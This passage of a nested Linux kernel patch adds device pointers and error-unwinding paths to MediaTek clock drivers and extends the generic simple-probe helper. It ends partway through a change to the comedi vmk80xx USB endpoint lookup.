+-	r = mtk_clk_register_muxes(top_mtk_muxes, ARRAY_SIZE(top_mtk_muxes), node,
++	r = mtk_clk_register_muxes(&pdev->dev, top_mtk_muxes,
++				   ARRAY_SIZE(top_mtk_muxes), node,
+ 				   &mt8186_clk_lock, clk_data);
+ 	if (r)
+ 		goto unregister_factors;
+ 
+-	r = mtk_clk_register_composites(top_muxes, ARRAY_SIZE(top_muxes), base,
++	r = mtk_clk_register_composites(&pdev->dev, top_muxes,
++					ARRAY_SIZE(top_muxes), base,
+ 					&mt8186_clk_lock, clk_data);
+ 	if (r)
+ 		goto unregister_muxes;
+ 
+-	r = mtk_clk_register_composites(top_adj_divs, ARRAY_SIZE(top_adj_divs), base,
++	r = mtk_clk_register_composites(&pdev->dev, top_adj_divs,
++					ARRAY_SIZE(top_adj_divs), base,
+ 					&mt8186_clk_lock, clk_data);
+ 	if (r)
+ 		goto unregister_composite_muxes;
+diff --git a/drivers/clk/mediatek/clk-mt8192-aud.c b/drivers/clk/mediatek/clk-mt8192-aud.c
+index 8c989bffd8c72..f524188fe4c2d 100644
+--- a/drivers/clk/mediatek/clk-mt8192-aud.c
++++ b/drivers/clk/mediatek/clk-mt8192-aud.c
+@@ -87,7 +87,8 @@ static int clk_mt8192_aud_probe(struct platform_device *pdev)
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	r = mtk_clk_register_gates(node, aud_clks, ARRAY_SIZE(aud_clks), clk_data);
++	r = mtk_clk_register_gates(&pdev->dev, node, aud_clks,
++				   ARRAY_SIZE(aud_clks), clk_data);
+ 	if (r)
+ 		return r;
+ 
+diff --git a/drivers/clk/mediatek/clk-mt8192-mm.c b/drivers/clk/mediatek/clk-mt8192-mm.c
+index 1be3ff4d407db..e9eb4cf8349ac 100644
+--- a/drivers/clk/mediatek/clk-mt8192-mm.c
++++ b/drivers/clk/mediatek/clk-mt8192-mm.c
+@@ -91,7 +91,8 @@ static int clk_mt8192_mm_probe(struct platform_device *pdev)
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	r = mtk_clk_register_gates(node, mm_clks, ARRAY_SIZE(mm_clks), clk_data);
++	r = mtk_clk_register_gates(&pdev->dev, node, mm_clks,
++			       ARRAY_SIZE(mm_clks), clk_data);
+ 	if (r)
+ 		return r;
+ 
+diff --git a/drivers/clk/mediatek/clk-mt8192.c b/drivers/clk/mediatek/clk-mt8192.c
+index d0f2269310706..16feb86dcb1b8 100644
+--- a/drivers/clk/mediatek/clk-mt8192.c
++++ b/drivers/clk/mediatek/clk-mt8192.c
+@@ -1100,27 +1100,68 @@ static int clk_mt8192_top_probe(struct platform_device *pdev)
+ 	if (IS_ERR(base))
+ 		return PTR_ERR(base);
+ 
+-	mtk_clk_register_fixed_clks(top_fixed_clks, ARRAY_SIZE(top_fixed_clks), top_clk_data);
+-	mtk_clk_register_factors(top_early_divs, ARRAY_SIZE(top_early_divs), top_clk_data);
+-	mtk_clk_register_factors(top_divs, ARRAY_SIZE(top_divs), top_clk_data);
+-	mtk_clk_register_muxes(top_mtk_muxes, ARRAY_SIZE(top_mtk_muxes), node, &mt8192_clk_lock,
+-			       top_clk_data);
+-	mtk_clk_register_composites(top_muxes, ARRAY_SIZE(top_muxes), base, &mt8192_clk_lock,
+-				    top_clk_data);
+-	mtk_clk_register_composites(top_adj_divs, ARRAY_SIZE(top_adj_divs), base, &mt8192_clk_lock,
+-				    top_clk_data);
+-	r = mtk_clk_register_gates(node, top_clks, ARRAY_SIZE(top_clks), top_clk_data);
++	r = mtk_clk_register_fixed_clks(top_fixed_clks, ARRAY_SIZE(top_fixed_clks), top_clk_data);
+ 	if (r)
+ 		return r;
+ 
++	r = mtk_clk_register_factors(top_early_divs, ARRAY_SIZE(top_early_divs), top_clk_data);
++	if (r)
++		goto unregister_fixed_clks;
++
++	r = mtk_clk_register_factors(top_divs, ARRAY_SIZE(top_divs), top_clk_data);
++	if (r)
++		goto unregister_early_factors;
++
++	r = mtk_clk_register_muxes(&pdev->dev, top_mtk_muxes,
++				   ARRAY_SIZE(top_mtk_muxes), node,
++				   &mt8192_clk_lock, top_clk_data);
++	if (r)
++		goto unregister_factors;
++
++	r = mtk_clk_register_composites(&pdev->dev, top_muxes,
++					ARRAY_SIZE(top_muxes), base,
++					&mt8192_clk_lock, top_clk_data);
++	if (r)
++		goto unregister_muxes;
++
++	r = mtk_clk_register_composites(&pdev->dev, top_adj_divs,
++					ARRAY_SIZE(top_adj_divs), base,
++					&mt8192_clk_lock, top_clk_data);
++	if (r)
++		goto unregister_top_composites;
++
++	r = mtk_clk_register_gates(&pdev->dev, node, top_clks,
++				   ARRAY_SIZE(top_clks), top_clk_data);
++	if (r)
++		goto unregister_adj_divs_composites;
++
+ 	r = clk_mt8192_reg_mfg_mux_notifier(&pdev->dev,
+ 					    top_clk_data->hws[CLK_TOP_MFG_PLL_SEL]->clk);
+ 	if (r)
+-		return r;
++		goto unregister_gates;
+ 
+-
+-	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get,
++	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, top_clk_data);
++	if (r)
++		goto unregister_gates;
++
++	return 0;
++
++unregister_gates:
++	mtk_clk_unregister_gates(top_clks, ARRAY_SIZE(top_clks), top_clk_data);
++unregister_adj_divs_composites:
++	mtk_clk_unregister_composites(top_adj_divs, ARRAY_SIZE(top_adj_divs), top_clk_data);
++unregister_top_composites:
++	mtk_clk_unregister_composites(top_muxes, ARRAY_SIZE(top_muxes), top_clk_data);
++unregister_muxes:
++	mtk_clk_unregister_muxes(top_mtk_muxes, ARRAY_SIZE(top_mtk_muxes), top_clk_data);
++unregister_factors:
++	mtk_clk_unregister_factors(top_divs, ARRAY_SIZE(top_divs), top_clk_data);
++unregister_early_factors:
++	mtk_clk_unregister_factors(top_early_divs, ARRAY_SIZE(top_early_divs), top_clk_data);
++unregister_fixed_clks:
++	mtk_clk_unregister_fixed_clks(top_fixed_clks, ARRAY_SIZE(top_fixed_clks),
+ 				      top_clk_data);
++	return r;
+ }
+ 
+ static int clk_mt8192_infra_probe(struct platform_device *pdev)
+@@ -1133,20 +1174,23 @@ static int clk_mt8192_infra_probe(struct platform_device *pdev)
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	r = mtk_clk_register_gates(node, infra_clks, ARRAY_SIZE(infra_clks), clk_data);
++	r = mtk_clk_register_gates(&pdev->dev, node, infra_clks,
++				   ARRAY_SIZE(infra_clks), clk_data);
+ 	if (r)
+ 		goto free_clk_data;
+ 
+ 	r = mtk_register_reset_controller_with_dev(&pdev->dev, &clk_rst_desc);
+ 	if (r)
+-		goto free_clk_data;
++		goto unregister_gates;
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+-		goto free_clk_data;
++		goto unregister_gates;
+ 
+ 	return r;
+ 
++unregister_gates:
++	mtk_clk_unregister_gates(infra_clks, ARRAY_SIZE(infra_clks), clk_data);
+ free_clk_data:
+ 	mtk_free_clk_data(clk_data);
+ 	return r;
+@@ -1162,16 +1206,19 @@ static int clk_mt8192_peri_probe(struct platform_device *pdev)
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	r = mtk_clk_register_gates(node, peri_clks, ARRAY_SIZE(peri_clks), clk_data);
++	r = mtk_clk_register_gates(&pdev->dev, node, peri_clks,
++				   ARRAY_SIZE(peri_clks), clk_data);
+ 	if (r)
+ 		goto free_clk_data;
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+-		goto free_clk_data;
++		goto unregister_gates;
+ 
+ 	return r;
+ 
++unregister_gates:
++	mtk_clk_unregister_gates(peri_clks, ARRAY_SIZE(peri_clks), clk_data);
+ free_clk_data:
+ 	mtk_free_clk_data(clk_data);
+ 	return r;
+@@ -1188,16 +1235,19 @@ static int clk_mt8192_apmixed_probe(struct platform_device *pdev)
+ 		return -ENOMEM;
+ 
+ 	mtk_clk_register_plls(node, plls, ARRAY_SIZE(plls), clk_data);
+-	r = mtk_clk_register_gates(node, apmixed_clks, ARRAY_SIZE(apmixed_clks), clk_data);
++	r = mtk_clk_register_gates(&pdev->dev, node, apmixed_clks,
++				   ARRAY_SIZE(apmixed_clks), clk_data);
+ 	if (r)
+ 		goto free_clk_data;
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+-		goto free_clk_data;
++		goto unregister_gates;
+ 
+ 	return r;
+ 
++unregister_gates:
++	mtk_clk_unregister_gates(apmixed_clks, ARRAY_SIZE(apmixed_clks), clk_data);
+ free_clk_data:
+ 	mtk_free_clk_data(clk_data);
+ 	return r;
+diff --git a/drivers/clk/mediatek/clk-mt8195-apmixedsys.c b/drivers/clk/mediatek/clk-mt8195-apmixedsys.c
+index 0dfed6ec4d155..1bc917f2667e4 100644
+--- a/drivers/clk/mediatek/clk-mt8195-apmixedsys.c
++++ b/drivers/clk/mediatek/clk-mt8195-apmixedsys.c
+@@ -124,7 +124,8 @@ static int clk_mt8195_apmixed_probe(struct platform_device *pdev)
+ 	if (r)
+ 		goto free_apmixed_data;
+ 
+-	r = mtk_clk_register_gates(node, apmixed_clks, ARRAY_SIZE(apmixed_clks), clk_data);
++	r = mtk_clk_register_gates(&pdev->dev, node, apmixed_clks,
++				   ARRAY_SIZE(apmixed_clks), clk_data);
+ 	if (r)
+ 		goto unregister_plls;
+ 
+diff --git a/drivers/clk/mediatek/clk-mt8195-topckgen.c b/drivers/clk/mediatek/clk-mt8195-topckgen.c
+index 1e016329c1d23..3485ebb17ab83 100644
+--- a/drivers/clk/mediatek/clk-mt8195-topckgen.c
++++ b/drivers/clk/mediatek/clk-mt8195-topckgen.c
+@@ -1262,7 +1262,8 @@ static int clk_mt8195_topck_probe(struct platform_device *pdev)
+ 	if (r)
+ 		goto unregister_fixed_clks;
+ 
+-	r = mtk_clk_register_muxes(top_mtk_muxes, ARRAY_SIZE(top_mtk_muxes), node,
++	r = mtk_clk_register_muxes(&pdev->dev, top_mtk_muxes,
++				   ARRAY_SIZE(top_mtk_muxes), node,
+ 				   &mt8195_clk_lock, top_clk_data);
+ 	if (r)
+ 		goto unregister_factors;
+@@ -1281,12 +1282,14 @@ static int clk_mt8195_topck_probe(struct platform_device *pdev)
+ 	if (r)
+ 		goto unregister_muxes;
+ 
+-	r = mtk_clk_register_composites(top_adj_divs, ARRAY_SIZE(top_adj_divs), base,
++	r = mtk_clk_register_composites(&pdev->dev, top_adj_divs,
++					ARRAY_SIZE(top_adj_divs), base,
+ 					&mt8195_clk_lock, top_clk_data);
+ 	if (r)
+ 		goto unregister_muxes;
+ 
+-	r = mtk_clk_register_gates(node, top_clks, ARRAY_SIZE(top_clks), top_clk_data);
++	r = mtk_clk_register_gates(&pdev->dev, node, top_clks,
++				   ARRAY_SIZE(top_clks), top_clk_data);
+ 	if (r)
+ 		goto unregister_composite_divs;
+ 
+diff --git a/drivers/clk/mediatek/clk-mt8195-vdo0.c b/drivers/clk/mediatek/clk-mt8195-vdo0.c
+index 07b46bfd50406..839b730688acb 100644
+--- a/drivers/clk/mediatek/clk-mt8195-vdo0.c
++++ b/drivers/clk/mediatek/clk-mt8195-vdo0.c
+@@ -104,7 +104,8 @@ static int clk_mt8195_vdo0_probe(struct platform_device *pdev)
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	r = mtk_clk_register_gates(node, vdo0_clks, ARRAY_SIZE(vdo0_clks), clk_data);
++	r = mtk_clk_register_gates(&pdev->dev, node, vdo0_clks,
++				   ARRAY_SIZE(vdo0_clks), clk_data);
+ 	if (r)
+ 		goto free_vdo0_data;
+ 
+diff --git a/drivers/clk/mediatek/clk-mt8195-vdo1.c b/drivers/clk/mediatek/clk-mt8195-vdo1.c
+index 835335b9d87bb..7df695b289258 100644
+--- a/drivers/clk/mediatek/clk-mt8195-vdo1.c
++++ b/drivers/clk/mediatek/clk-mt8195-vdo1.c
+@@ -131,7 +131,8 @@ static int clk_mt8195_vdo1_probe(struct platform_device *pdev)
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	r = mtk_clk_register_gates(node, vdo1_clks, ARRAY_SIZE(vdo1_clks), clk_data);
++	r = mtk_clk_register_gates(&pdev->dev, node, vdo1_clks,
++				   ARRAY_SIZE(vdo1_clks), clk_data);
+ 	if (r)
+ 		goto free_vdo1_data;
+ 
+diff --git a/drivers/clk/mediatek/clk-mt8365-mm.c b/drivers/clk/mediatek/clk-mt8365-mm.c
+index 5c8bf18ab1f1d..22c75a03a6452 100644
+--- a/drivers/clk/mediatek/clk-mt8365-mm.c
++++ b/drivers/clk/mediatek/clk-mt8365-mm.c
+@@ -81,9 +81,8 @@ static int clk_mt8365_mm_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_MM_NR_CLK);
+ 
+-	ret = mtk_clk_register_gates_with_dev(node, mm_clks,
+-					      ARRAY_SIZE(mm_clks), clk_data,
+-					      dev);
++	ret = mtk_clk_register_gates(dev, node, mm_clks,
++				     ARRAY_SIZE(mm_clks), clk_data);
+ 	if (ret)
+ 		goto err_free_clk_data;
+ 
+diff --git a/drivers/clk/mediatek/clk-mt8365.c b/drivers/clk/mediatek/clk-mt8365.c
+index adfecb618f102..c9faa07ec0a64 100644
+--- a/drivers/clk/mediatek/clk-mt8365.c
++++ b/drivers/clk/mediatek/clk-mt8365.c
+@@ -947,12 +947,13 @@ static int clk_mt8365_top_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto unregister_fixed_clks;
+ 
+-	ret = mtk_clk_register_muxes(top_muxes, ARRAY_SIZE(top_muxes), node,
++	ret = mtk_clk_register_muxes(&pdev->dev, top_muxes,
++				     ARRAY_SIZE(top_muxes), node,
+ 				     &mt8365_clk_lock, clk_data);
+ 	if (ret)
+ 		goto unregister_factors;
+ 
+-	ret = mtk_clk_register_composites(top_misc_mux_gates,
++	ret = mtk_clk_register_composites(&pdev->dev, top_misc_mux_gates,
+ 					  ARRAY_SIZE(top_misc_mux_gates), base,
+ 					  &mt8365_clk_lock, clk_data);
+ 	if (ret)
+@@ -1019,8 +1020,8 @@ static int clk_mt8365_infra_probe(struct platform_device *pdev)
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	ret = mtk_clk_register_gates(node, ifr_clks, ARRAY_SIZE(ifr_clks),
+-				     clk_data);
++	ret = mtk_clk_register_gates(&pdev->dev, node, ifr_clks,
++				     ARRAY_SIZE(ifr_clks), clk_data);
+ 	if (ret)
+ 		goto free_clk_data;
+ 
+@@ -1080,8 +1081,9 @@ static int clk_mt8365_mcu_probe(struct platform_device *pdev)
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	ret = mtk_clk_register_composites(mcu_muxes, ARRAY_SIZE(mcu_muxes),
+-					  base, &mt8365_clk_lock, clk_data);
++	ret = mtk_clk_register_composites(&pdev->dev, mcu_muxes,
++					  ARRAY_SIZE(mcu_muxes), base,
++					  &mt8365_clk_lock, clk_data);
+ 	if (ret)
+ 		goto free_clk_data;
+ 
+diff --git a/drivers/clk/mediatek/clk-mt8516-aud.c b/drivers/clk/mediatek/clk-mt8516-aud.c
+index a3dafc719799c..a6ae8003b9ff6 100644
+--- a/drivers/clk/mediatek/clk-mt8516-aud.c
++++ b/drivers/clk/mediatek/clk-mt8516-aud.c
+@@ -48,7 +48,7 @@ static void __init mtk_audsys_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_AUD_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, aud_clks, ARRAY_SIZE(aud_clks), clk_data);
++	mtk_clk_register_gates(NULL, node, aud_clks, ARRAY_SIZE(aud_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+diff --git a/drivers/clk/mediatek/clk-mt8516.c b/drivers/clk/mediatek/clk-mt8516.c
+index 056953d594c66..6983d3a48dc9a 100644
+--- a/drivers/clk/mediatek/clk-mt8516.c
++++ b/drivers/clk/mediatek/clk-mt8516.c
+@@ -655,11 +655,12 @@ static void __init mtk_topckgen_init(struct device_node *node)
+ 
+ 	mtk_clk_register_fixed_clks(fixed_clks, ARRAY_SIZE(fixed_clks),
+ 				    clk_data);
+-	mtk_clk_register_gates(node, top_clks, ARRAY_SIZE(top_clks), clk_data);
++	mtk_clk_register_gates(NULL, node, top_clks, ARRAY_SIZE(top_clks), clk_data);
+ 
+ 	mtk_clk_register_factors(top_divs, ARRAY_SIZE(top_divs), clk_data);
+-	mtk_clk_register_composites(top_muxes, ARRAY_SIZE(top_muxes), base,
+-		&mt8516_clk_lock, clk_data);
++	mtk_clk_register_composites(NULL, top_muxes,
++				    ARRAY_SIZE(top_muxes), base,
++				    &mt8516_clk_lock, clk_data);
+ 	mtk_clk_register_dividers(top_adj_divs, ARRAY_SIZE(top_adj_divs),
+ 				base, &mt8516_clk_lock, clk_data);
+ 
+@@ -684,8 +685,9 @@ static void __init mtk_infracfg_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_IFR_NR_CLK);
+ 
+-	mtk_clk_register_composites(ifr_muxes, ARRAY_SIZE(ifr_muxes), base,
+-		&mt8516_clk_lock, clk_data);
++	mtk_clk_register_composites(NULL, ifr_muxes,
++				    ARRAY_SIZE(ifr_muxes), base,
++				    &mt8516_clk_lock, clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+diff --git a/drivers/clk/mediatek/clk-mtk.c b/drivers/clk/mediatek/clk-mtk.c
+index d31f01d0ba1c2..fa2c1b1c7dee4 100644
+--- a/drivers/clk/mediatek/clk-mtk.c
++++ b/drivers/clk/mediatek/clk-mtk.c
+@@ -11,12 +11,15 @@
+ #include <linux/mfd/syscon.h>
+ #include <linux/module.h>
+ #include <linux/of.h>
++#include <linux/of_address.h>
+ #include <linux/of_device.h>
+ #include <linux/platform_device.h>
++#include <linux/pm_runtime.h>
+ #include <linux/slab.h>
+ 
+ #include "clk-mtk.h"
+ #include "clk-gate.h"
++#include "clk-mux.h"
+ 
+ static void mtk_init_clk_data(struct clk_hw_onecell_data *clk_data,
+ 			      unsigned int clk_num)
+@@ -197,8 +200,8 @@ void mtk_clk_unregister_factors(const struct mtk_fixed_factor *clks, int num,
+ }
+ EXPORT_SYMBOL_GPL(mtk_clk_unregister_factors);
+ 
+-static struct clk_hw *mtk_clk_register_composite(const struct mtk_composite *mc,
+-		void __iomem *base, spinlock_t *lock)
++static struct clk_hw *mtk_clk_register_composite(struct device *dev,
++		const struct mtk_composite *mc, void __iomem *base, spinlock_t *lock)
+ {
+ 	struct clk_hw *hw;
+ 	struct clk_mux *mux = NULL;
+@@ -264,7 +267,7 @@ static struct clk_hw *mtk_clk_register_composite(const struct mtk_composite *mc,
+ 		div_ops = &clk_divider_ops;
+ 	}
+ 
+-	hw = clk_hw_register_composite(NULL, mc->name, parent_names, num_parents,
++	hw = clk_hw_register_composite(dev, mc->name, parent_names, num_parents,
+ 		mux_hw, mux_ops,
+ 		div_hw, div_ops,
+ 		gate_hw, gate_ops,
+@@ -308,7 +311,8 @@ static void mtk_clk_unregister_composite(struct clk_hw *hw)
+ 	kfree(mux);
+ }
+ 
+-int mtk_clk_register_composites(const struct mtk_composite *mcs, int num,
++int mtk_clk_register_composites(struct device *dev,
++				const struct mtk_composite *mcs, int num,
+ 				void __iomem *base, spinlock_t *lock,
+ 				struct clk_hw_onecell_data *clk_data)
+ {
+@@ -327,7 +331,7 @@ int mtk_clk_register_composites(const struct mtk_composite *mcs, int num,
+ 			continue;
+ 		}
+ 
+-		hw = mtk_clk_register_composite(mc, base, lock);
++		hw = mtk_clk_register_composite(dev, mc, base, lock);
+ 
+ 		if (IS_ERR(hw)) {
+ 			pr_err("Failed to register clk %s: %pe\n", mc->name,
+@@ -449,20 +453,81 @@ int mtk_clk_simple_probe(struct platform_device *pdev)
+ 	const struct mtk_clk_desc *mcd;
+ 	struct clk_hw_onecell_data *clk_data;
+ 	struct device_node *node = pdev->dev.of_node;
+-	int r;
++	void __iomem *base;
++	int num_clks, r;
+ 
+ 	mcd = of_device_get_match_data(&pdev->dev);
+ 	if (!mcd)
+ 		return -EINVAL;
+ 
+-	clk_data = mtk_alloc_clk_data(mcd->num_clks);
++	/* Composite clocks need us to pass the iomem pointer */
++	if (mcd->composite_clks) {
++		if (!mcd->shared_io)
++			base = devm_platform_ioremap_resource(pdev, 0);
++		else
++			base = of_iomap(node, 0);
++
++		if (IS_ERR_OR_NULL(base))
++			return IS_ERR(base) ? PTR_ERR(base) : -ENOMEM;
++	}
++
++
++	devm_pm_runtime_enable(&pdev->dev);
++	/*
++	 * Do a pm_runtime_resume_and_get() to work around a possible
++	 * deadlock between clk_register() and the genpd framework.
++	 */
++	r = pm_runtime_resume_and_get(&pdev->dev);
++	if (r)
++		return r;
++
++	/* Calculate how many clk_hw_onecell_data entries to allocate */
++	num_clks = mcd->num_clks + mcd->num_composite_clks;
++	num_clks += mcd->num_fixed_clks + mcd->num_factor_clks;
++	num_clks += mcd->num_mux_clks;
++
++	clk_data = mtk_alloc_clk_data(num_clks);
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	r = mtk_clk_register_gates_with_dev(node, mcd->clks, mcd->num_clks,
+-					    clk_data, &pdev->dev);
+-	if (r)
+-		goto free_data;
++	if (mcd->fixed_clks) {
++		r = mtk_clk_register_fixed_clks(mcd->fixed_clks,
++						mcd->num_fixed_clks, clk_data);
++		if (r)
++			goto free_data;
++	}
++
++	if (mcd->factor_clks) {
++		r = mtk_clk_register_factors(mcd->factor_clks,
++					     mcd->num_factor_clks, clk_data);
++		if (r)
++			goto unregister_fixed_clks;
++	}
++
++	if (mcd->mux_clks) {
++		r = mtk_clk_register_muxes(&pdev->dev, mcd->mux_clks,
++					   mcd->num_mux_clks, node,
++					   mcd->clk_lock, clk_data);
++		if (r)
++			goto unregister_factors;
++	}
++
++	if (mcd->composite_clks) {
++		/* We don't check mcd->clk_lock because it's optional */
++		r = mtk_clk_register_composites(&pdev->dev,
++						mcd->composite_clks,
++						mcd->num_composite_clks,
++						base, mcd->clk_lock, clk_data);
++		if (r)
++			goto unregister_muxes;
++	}
++
++	if (mcd->clks) {
++		r = mtk_clk_register_gates(&pdev->dev, node, mcd->clks,
++					   mcd->num_clks, clk_data);
++		if (r)
++			goto unregister_composites;
++	}
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+@@ -477,12 +542,35 @@ int mtk_clk_simple_probe(struct platform_device *pdev)
+ 			goto unregister_clks;
+ 	}
+ 
++	pm_runtime_put(&pdev->dev);
++
+ 	return r;
+ 
+ unregister_clks:
+-	mtk_clk_unregister_gates(mcd->clks, mcd->num_clks, clk_data);
++	if (mcd->clks)
++		mtk_clk_unregister_gates(mcd->clks, mcd->num_clks, clk_data);
++unregister_composites:
++	if (mcd->composite_clks)
++		mtk_clk_unregister_composites(mcd->composite_clks,
++					      mcd->num_composite_clks, clk_data);
++unregister_muxes:
++	if (mcd->mux_clks)
++		mtk_clk_unregister_muxes(mcd->mux_clks,
++					 mcd->num_mux_clks, clk_data);
++unregister_factors:
++	if (mcd->factor_clks)
++		mtk_clk_unregister_factors(mcd->factor_clks,
++					   mcd->num_factor_clks, clk_data);
++unregister_fixed_clks:
++	if (mcd->fixed_clks)
++		mtk_clk_unregister_fixed_clks(mcd->fixed_clks,
++					      mcd->num_fixed_clks, clk_data);
+ free_data:
+ 	mtk_free_clk_data(clk_data);
++	if (mcd->shared_io && base)
++		iounmap(base);
++
++	pm_runtime_put(&pdev->dev);
+ 	return r;
+ }
+ EXPORT_SYMBOL_GPL(mtk_clk_simple_probe);
+@@ -494,7 +582,20 @@ int mtk_clk_simple_remove(struct platform_device *pdev)
+ 	struct device_node *node = pdev->dev.of_node;
+ 
+ 	of_clk_del_provider(node);
+-	mtk_clk_unregister_gates(mcd->clks, mcd->num_clks, clk_data);
++	if (mcd->clks)
++		mtk_clk_unregister_gates(mcd->clks, mcd->num_clks, clk_data);
++	if (mcd->composite_clks)
++		mtk_clk_unregister_composites(mcd->composite_clks,
++					      mcd->num_composite_clks, clk_data);
++	if (mcd->mux_clks)
++		mtk_clk_unregister_muxes(mcd->mux_clks,
++					 mcd->num_mux_clks, clk_data);
++	if (mcd->factor_clks)
++		mtk_clk_unregister_factors(mcd->factor_clks,
++					   mcd->num_factor_clks, clk_data);
++	if (mcd->fixed_clks)
++		mtk_clk_unregister_fixed_clks(mcd->fixed_clks,
++					      mcd->num_fixed_clks, clk_data);
+ 	mtk_free_clk_data(clk_data);
+ 
+ 	return 0;
+diff --git a/drivers/clk/mediatek/clk-mtk.h b/drivers/clk/mediatek/clk-mtk.h
+index 63ae7941aa92f..880b3d6d80119 100644
+--- a/drivers/clk/mediatek/clk-mtk.h
++++ b/drivers/clk/mediatek/clk-mtk.h
+@@ -149,7 +149,8 @@ struct mtk_composite {
+ 		.flags = 0,						\
+ 	}
+ 
+-int mtk_clk_register_composites(const struct mtk_composite *mcs, int num,
++int mtk_clk_register_composites(struct device *dev,
++				const struct mtk_composite *mcs, int num,
+ 				void __iomem *base, spinlock_t *lock,
+ 				struct clk_hw_onecell_data *clk_data);
+ void mtk_clk_unregister_composites(const struct mtk_composite *mcs, int num,
+@@ -195,7 +196,17 @@ void mtk_clk_unregister_ref2usb_tx(struct clk_hw *hw);
+ struct mtk_clk_desc {
+ 	const struct mtk_gate *clks;
+ 	size_t num_clks;
++	const struct mtk_composite *composite_clks;
++	size_t num_composite_clks;
++	const struct mtk_fixed_clk *fixed_clks;
++	size_t num_fixed_clks;
++	const struct mtk_fixed_factor *factor_clks;
++	size_t num_factor_clks;
++	const struct mtk_mux *mux_clks;
++	size_t num_mux_clks;
+ 	const struct mtk_clk_rst_desc *rst_desc;
++	spinlock_t *clk_lock;
++	bool shared_io;
+ };
+ 
+ int mtk_clk_simple_probe(struct platform_device *pdev);
+diff --git a/drivers/clk/mediatek/clk-mux.c b/drivers/clk/mediatek/clk-mux.c
+index ba1720b9e2310..c8593554239d6 100644
+--- a/drivers/clk/mediatek/clk-mux.c
++++ b/drivers/clk/mediatek/clk-mux.c
+@@ -154,9 +154,10 @@ const struct clk_ops mtk_mux_gate_clr_set_upd_ops  = {
+ };
+ EXPORT_SYMBOL_GPL(mtk_mux_gate_clr_set_upd_ops);
+ 
+-static struct clk_hw *mtk_clk_register_mux(const struct mtk_mux *mux,
+-				 struct regmap *regmap,
+-				 spinlock_t *lock)
++static struct clk_hw *mtk_clk_register_mux(struct device *dev,
++					   const struct mtk_mux *mux,
++					   struct regmap *regmap,
++					   spinlock_t *lock)
+ {
+ 	struct mtk_clk_mux *clk_mux;
+ 	struct clk_init_data init = {};
+@@ -177,7 +178,7 @@ static struct clk_hw *mtk_clk_register_mux(const struct mtk_mux *mux,
+ 	clk_mux->lock = lock;
+ 	clk_mux->hw.init = &init;
+ 
+-	ret = clk_hw_register(NULL, &clk_mux->hw);
++	ret = clk_hw_register(dev, &clk_mux->hw);
+ 	if (ret) {
+ 		kfree(clk_mux);
+ 		return ERR_PTR(ret);
+@@ -198,7 +199,8 @@ static void mtk_clk_unregister_mux(struct clk_hw *hw)
+ 	kfree(mux);
+ }
+ 
+-int mtk_clk_register_muxes(const struct mtk_mux *muxes,
++int mtk_clk_register_muxes(struct device *dev,
++			   const struct mtk_mux *muxes,
+ 			   int num, struct device_node *node,
+ 			   spinlock_t *lock,
+ 			   struct clk_hw_onecell_data *clk_data)
+@@ -222,7 +224,7 @@ int mtk_clk_register_muxes(const struct mtk_mux *muxes,
+ 			continue;
+ 		}
+ 
+-		hw = mtk_clk_register_mux(mux, regmap, lock);
++		hw = mtk_clk_register_mux(dev, mux, regmap, lock);
+ 
+ 		if (IS_ERR(hw)) {
+ 			pr_err("Failed to register clk %s: %pe\n", mux->name,
+diff --git a/drivers/clk/mediatek/clk-mux.h b/drivers/clk/mediatek/clk-mux.h
+index 83ff420f4ebe6..7ecb963b0ec68 100644
+--- a/drivers/clk/mediatek/clk-mux.h
++++ b/drivers/clk/mediatek/clk-mux.h
+@@ -83,7 +83,8 @@ extern const struct clk_ops mtk_mux_gate_clr_set_upd_ops;
+ 			0, _upd_ofs, _upd, CLK_SET_RATE_PARENT,		\
+ 			mtk_mux_clr_set_upd_ops)
+ 
+-int mtk_clk_register_muxes(const struct mtk_mux *muxes,
++int mtk_clk_register_muxes(struct device *dev,
++			   const struct mtk_mux *muxes,
+ 			   int num, struct device_node *node,
+ 			   spinlock_t *lock,
+ 			   struct clk_hw_onecell_data *clk_data);
+diff --git a/drivers/comedi/drivers/vmk80xx.c b/drivers/comedi/drivers/vmk80xx.c
+index 4536ed43f65b2..84dce5184a77a 100644
+--- a/drivers/comedi/drivers/vmk80xx.c
++++ b/drivers/comedi/drivers/vmk80xx.c
+@@ -641,33 +641,22 @@ static int vmk80xx_find_usb_endpoints(struct comedi_device *dev)
+ 	struct vmk80xx_private *devpriv = dev->private;
+ 	struct usb_interface *intf = comedi_to_usb_interface(dev);
+ 	struct usb_host_interface *iface_desc = intf->cur_altsetting;
+-	struct usb_endpoint_descriptor *ep_desc;
+-	int i;
+-
+-	if (iface_desc->desc.bNumEndpoints != 2)
+-		return -ENODEV;
+-
+-	for (i = 0; i < iface_desc->desc.bNumEndpoints; i++) {
+-		ep_desc = &iface_desc->endpoint[i].desc;
+-
+-		if (usb_endpoint_is_int_in(ep_desc) ||
+-		    usb_endpoint_is_bulk_in(ep_desc)) {
+-			if (!devpriv->ep_rx)
